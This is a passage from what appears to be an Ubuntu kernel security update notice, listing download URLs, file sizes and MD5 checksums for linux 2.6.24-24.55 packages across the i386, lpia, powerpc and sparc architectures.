http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 209782 13517227a395e3b14e02c55a04d9b4a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 213588 e303705801fc9b3fb8f04b49c18f8d20 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 46558 47c3d466e4f4e2725a11e60e8869d501 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 47578 3680b979071cb88973c8aa33f94f2037 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 62250 79aec11c8be1c769f018f94cbe9c1e42 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 63618 5f60fbf8b28c79d969bbda9f457e5761 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 130296 744b0747406ed2d6b4d57eac25a866ae http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 136874 923a1fde2cf0625dd1a4de29e9738fac http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 278542 56184e755e1b37390051b10d66615d8e http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 277118 b273c46bbceb8d256b04295ea3f6bc5c http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 2008816 96b6e6b4d202c7d4edcd9a4e9257e663 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 2086100 0199324ff0fe5d6e7d833a3c07a6ac0a http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-386_2.6.24-24.55_i386.deb Size/MD5: 652664 06b4ba3927add4c3a8fb5ee484129bd5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_i386.deb Size/MD5: 655538 f1aad1bb26f9fdaea6bee64cdf6e69d7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_i386.deb Size/MD5: 1239292 17b21b1c71a637a1f3470befdc6e244c http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_i386.deb Size/MD5: 1259626 c857ca06ef5630c9b6faad7c13ef1449 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_i386.deb Size/MD5: 657340 e5fc27b2ba6419ae6110bfdb147dc50a http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-virtual_2.6.24-24.55_i386.deb Size/MD5: 557898 1d6abe04efc461e263605280c3d6a327 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_i386.deb Size/MD5: 1058088 1de1a8532504cfab66b9afb58aa7fd64 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-386_2.6.24-24.55_i386.deb Size/MD5: 18368104 894bae5c45f3313fa6ffde9c5403a050 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_i386.deb Size/MD5: 18389358 0f87aba56c1e970dcc7a05c178764c59 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_i386.deb Size/MD5: 18498588 f5c1063f494bd8000f41db10a4c923a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-virtual_2.6.24-24.55_i386.deb Size/MD5: 8686422 ff430f2f608d318cfdc9ee1f085232c0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-386_2.6.24-24.55_i386.deb Size/MD5: 25497824 3fdb3a0bae1754cc7dcd5fc13e5c92f3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_i386.deb Size/MD5: 26304704 fbf86e8b9355cd2a4dc4e964ce93a1e1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_i386.deb Size/MD5: 27324298 f2411de5448b6b3dc5041ae93e3fbad8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-virtual_2.6.24-24.55_i386.deb Size/MD5: 24820580 7c3be9e7dca67713529e3f593c28ca8d http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_i386.deb Size/MD5: 705292 e7ea84e2f6120b20e2718223efe47e4a http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 258744 758ec24355c4c81cb04be0b337b79d22 http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 264062 c3f0e5c7f02e751e8db755eb939e493f http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 163194 681a38c27b55f122aff23ddc43358e82 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 162950 64cab9f1cece7117949678fd7022be38 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 236500 02a04c11e39555ded5a1af39a31f2e1b http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 244826 1536f32ebccf86886505f5c111275425 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 1809006 eaa66dd9cdf3cae2f3387bc50b0aca3f http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 1826238 ef6179911307b224bfbc9442d401168d http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 150794 3dce18851cd0f9da0e49af7df236dac8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 142948 69d90acefce82696bb1db4f68bfc70c9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 155958 15a467bdd1e7bdbf50d61a024502acb4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 156974 69832b6793dd3c121ae93eada967077d http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 107174 d2138453acdf0e700bdf074e33e99286 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 108480 fedf19d305e641f2d3c370dced2309e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 32962 e7bd906326133b9381e2cb49c8af646b http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 33388 bcad2f4d1eb61a1d7d795e75854ca434 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 60704 84ae7bb7df1e8102cb7a7a190d963362 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 61154 66fd1b4c06a054c95fad67893640b621 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 82652 ce2130dbd82535557b662084e728928a http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 82958 d439c65c130de9fa29027716f8710874 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 48356 daa2818cfb4b21a7032416c18182b147 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 48244 6a2211f86f7f8df90c5b8ceb38a4a627 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 8190 b40afdf981d8fe354b20d0bc7cc83c3a http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 8440 70afae21dbbd5f5cef34294c8de8e725 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 51050 5fe6712265c74000a7d92360c4d1ac81 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 52908 cf6981bb68eb23f899b6a55642238b7b http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 92184 fe7ae21dc89d89b1921f4ed7cbbabf59 http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 92448 e18bed4505a2ca45dfd67499c87f3b8b http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 1442928 f9784301cbe888b3a7610f69210845c9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 1426196 fee708e2af1dab92610fb1c3496c95da http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 43236 4b344cdc662f35bad896e8c7bc726f21 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 42796 91578f1e887bac7983dae7884b357616 http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 11406 097f3d4965b4fb4b62250309b71ea556 http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 12016 4c3681d6ac324a27218a5d7f1eb012a4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 470332 975e3f02a4bdd541e27f7c917bcfcb11 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 472254 3d79ecbffb9a08a25f5e818718137079 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 70450 aeb3fece9342114f992fec68f5d48f71 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 71368 a6bb96b015f25d08f5628aeedd3bcb81 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_i386.deb Size/MD5: 20243576 c1424fd878abdcd2a7bc29fc88369c9b http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_i386.deb Size/MD5: 18527060 4213eff1e17851fd9a6ba77150b54638 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_i386.deb Size/MD5: 18773284 a33c73287198621afbe02e414e91d696 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpia_2.6.24-24.55_lpia.deb Size/MD5: 636610 4747e9fa2334ce46a6f0700646291dd9 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb Size/MD5: 703234 44e3bcfa9a931471c392192cfb0c54a8 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-lpia_2.6.24-24.55_lpia.deb Size/MD5: 14504750 5e482a7e08464985b808a6230a00d1b3 http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_lpia.deb Size/MD5: 705278 c7d8b590dbff2f80c38689e174e2723a http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb Size/MD5: 19810228 4d05fa4a2372061c0c1ac2637ee08ff6 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 334050 549350eae9ac212a55977acc795e683f http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 318864 ab27ac3a958eb09b9d12fafd09a77df8 http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 62716 00b04f957690db8a0ba8a22438f2e496 http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 73002 e8cb037fdde1bdb771482900638bb6d4 http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 41434 88738c9f94ad51860b132ec86417d295 http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 47824 b3c9f8d3e3d792c644dc6dff2da19df8 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 89458 52a345ac135c1ac50f528412b7d31f75 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 105682 57846bf90eef89a20cdf99b67e2f6b2a http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 44804 3f9bc834fa30a5f15a054bc4a1ffcae0 http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 40928 a1c7bfd9166c6dbd96f79c7454d72bb4 http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 704240 118333ea34b764806834b8da0975eb32 http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 770534 f2ff41faa006ee681e1f0fa467626f98 http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 242804 cd1d00ce97f420cc7a7ea0e73b11bc17 http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 245874 bddc2d618001db1be1d3330b921e498a http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 69130 630b48f7871d88b3c2ec42ba406b56df http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 132574 c32734e71c98e17a3d3326c2d0caaa03 http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 70240 1f2caeecf72dea50709079d5987714e8 http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 77438 9c53877ef28007ed1185a93ec5cf90f5 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 146066 8b3b83976cc2eec52b5dbb49568c2b44 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 165040 7e0732ce30c7d287c6897fd89f0eab03 http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 387144 7681e85a926a3cfd4bd1101bfe802ef0 http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 350038 c70af186448028febde4ce8eb77751f7 http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 2429338 f466200ef72ff34ab3048e67e2fefa4d http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 3471000 339b6ce1c1190471faa546011cbe67a6 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb Size/MD5: 650754 d55d970951a1844ed71f6e3c91709989 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb Size/MD5: 654978 1b04d2d2aab7846f7799a90433106d2e http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb Size/MD5: 650486 a9a4f052ac25ea294b6d285808c441da http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb Size/MD5: 20160752 f0ee78fa89e85b317dc850d8a5cd5f4c http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb Size/MD5: 21366650 f8c2e33729bac5cc66aade8eed5893a9 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb Size/MD5: 19924130 c30583206aa8506e4f8316e3519bb038 http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_powerpc.deb Size/MD5: 695442 60d6d8281a73567a3a1859e603604f2d http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 266766 d734653d249aba57e366ae07a6b1fc93 http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 307642 097f927755577ead97570034ae0f6388 http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 192170 d8d4fde8fe228d72875d66dd761ed7df http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 201578 5f98ef6e232bfb91d8a91be636a154c9 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 271794 5072cd3330a816dcaa3a77f3805464e3 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 305896 4fe491fccc865c3d73ccf92bae2544b5 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 1806898 510190e890ad1fc342fafec66b6ab616 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 2117694 2af9aa4973ab6554eaf799abcff3e1b9 http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 235192 379bf968241b634089ebbf2a3ba440e0 http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 225202 4066dff0c55796f0af7809947252d479 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 170102 1a3ccf3058cab72bba610082bd9dd390 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 199686 447cab0246a933abfac18838eaac032a http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 117910 9074869c8dad579b52daaafefebd100c http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 139200 06c2711f162832bcaf4141298024f18e http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 45366 e9f0bb9ae84949936a872f1a90ad4118 http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 46836 05b95ec8a1a0557f8b82e1b0000e2dcc http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 51136 34dd7d7fb1c2ed5e3d1c737573fb2cd5 http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 60286 99bbe8d8d2ffb39ba38190798354c608 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 74166 682080eb95c5a3820aacf3a3654e9a77 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 87206 4e21dc9fe1e1899d668fa3e0a5e15e14 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 76004 1ae6a390c94233465c10686bf504e4bc http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 30226 9649e84d3347d6ff643833bb0911f670 http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 8492 100b04ee69053cb99263a9639d1fe52e http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 10026 9b7c48978f55d3ab82a253db053175d7 http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 57368 dbba71ebc8d5e9ab03a061cc143d8c6e http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 68688 9dba3901ed2ccf499412430b8ae02ffe http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 101246 290026d8946c001bd7e2f9e8d6510a6b http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 147768 ad3b8e8f8947d09aa69cbd7f9034e440 http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 1565048 4e7fd21f0fa808514fc1f84e6113e4dd http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 1514044 2eb4cb565003a82d51c8cc36db03c6e7 http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 76680 6c5817e16da05b6017c93af9ac31fe2d http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 85964 45673fac64f8a6d5074a5173bfeb38e0 http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 12710 25923caf1ed00118907a4e61b5df617f http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 14558 22805c8e35fa454f643f9913f2a0083d http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 449544 ff9ce90996651531510b7880de3d87fd http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 504018 c28ce7f4984fff73f65845d644d956db http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb Size/MD5: 83508 cc54fd358a4e6f5b812fefc493f53d49 http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb Size/MD5: 108720 70ec0fd895b63491bc5b5e895d23e730 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 59596 e0228d1b8d48dcb9b2eeb5a133fd4fea http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 71728 1cde4a7c06765886c874a504349c7295 http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 42454 dede4ea8cdb116e8865de77c903012a6 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 91760 fb38bcd0b2c03e153c25569fd6bf6f7f http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 587002 31d43eb6a4b4fba550bd644c5e3dab86 http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 171008 431c1bde571792a29e2c746ac89f4069 http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 22354 17062dcda3c2018f97dbc320045cff0e http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 46050 111c0d79c0bdad8a685f422383037219 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 152862 e2cc622a55df2744b07812def8c89239 http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb Size/MD5: 2121270 a2a2e37a9c05525401efaffc7ce199e7 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb Size/MD5: 562642 a76540180de0ac6e12dac23389ac1b3f http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64_2.6.24-24.55_sparc.deb Size/MD5: 560822 72eb5f3fcb523dd8106850417fd0520e 